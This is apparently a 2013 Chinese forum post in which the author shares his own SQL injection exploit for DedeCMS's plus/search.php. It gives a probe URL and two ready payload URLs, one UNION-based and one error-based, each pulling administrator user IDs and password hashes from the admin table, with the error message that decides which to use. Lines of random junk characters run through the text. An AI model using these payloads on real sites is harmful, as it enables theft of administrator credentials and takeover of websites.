转载不加作者名的没JJ
% C+ a% e+ f" F( ^: c" Y: g
, s7 o/ G( _6 O1 [* a6 o哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
" w! r T- f( w2 A. e/ ~( H$ p+ N# N# c0 n2 }. d/ Z) U/ s3 e- O& ~" p
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
B- Q7 ^: Z7 u6 t/ Y) x! V% {' o1 \/ L6 i; f) }( Y/ {& X
我一般是这样测试的:
2 b! I# r0 p: ?1 f& a. A6 _2 E0 B( m) v P- \6 H# {
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a0 k) U1 F* M1 g" J! ?
9 M3 z+ A, C' M3 e5 o! ^4 o
转载不加作者名的没JJ8 C" }; V! J! m$ n/ _5 h9 B0 ~* @
% x) z v" g5 g' r C) N
作者:鬼哥
+ ~, \5 ]- V9 m6 u6 `% {( w, p& h2 F, H
' ^6 w1 u: M) L5 @3 G- q! P1 ] i$ x
看结果如果提示
* @ Y$ n6 T: a; J4 q% M$ X
3 V" W6 r, O& @1 eSafe Alert: Request Error step 2 !
6 a, J- T) _0 o% V) M! c8 s! c! `6 S. E" s! u' z
那么直接用下面的exp
. T* T' }- ~$ n: h' N1 D$ a4 R* f8 h" w" T8 \+ v
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
' v' l$ J' ^. V7 _8 a+ f# m t/ g( g0 D4 S
# H: R2 [# Z! p6 i& J
看结果如果提示! L N& Z, N& L) T# H4 D/ R8 \, U
' |0 j' ^' X: s: e) t' WSafe Alert: Request Error step 1 !
; D, ~0 A+ S2 D4 f- N# s
, l$ Q$ U+ w3 _1 p那么直接用下面的exp
3 F% X( v( j$ }8 ?7 C! p
+ [' M% l& B9 [0 I& uxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a9 I6 _ Z: Q7 M" h# M
7 m$ [5 I: A: i- X$ a$ H9 P; ~& [: N; g4 z
如果正常显示证明漏洞不存在了。
0 ?; `$ q5 {: ?8 b0 e4 T: b0 I& u+ x
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对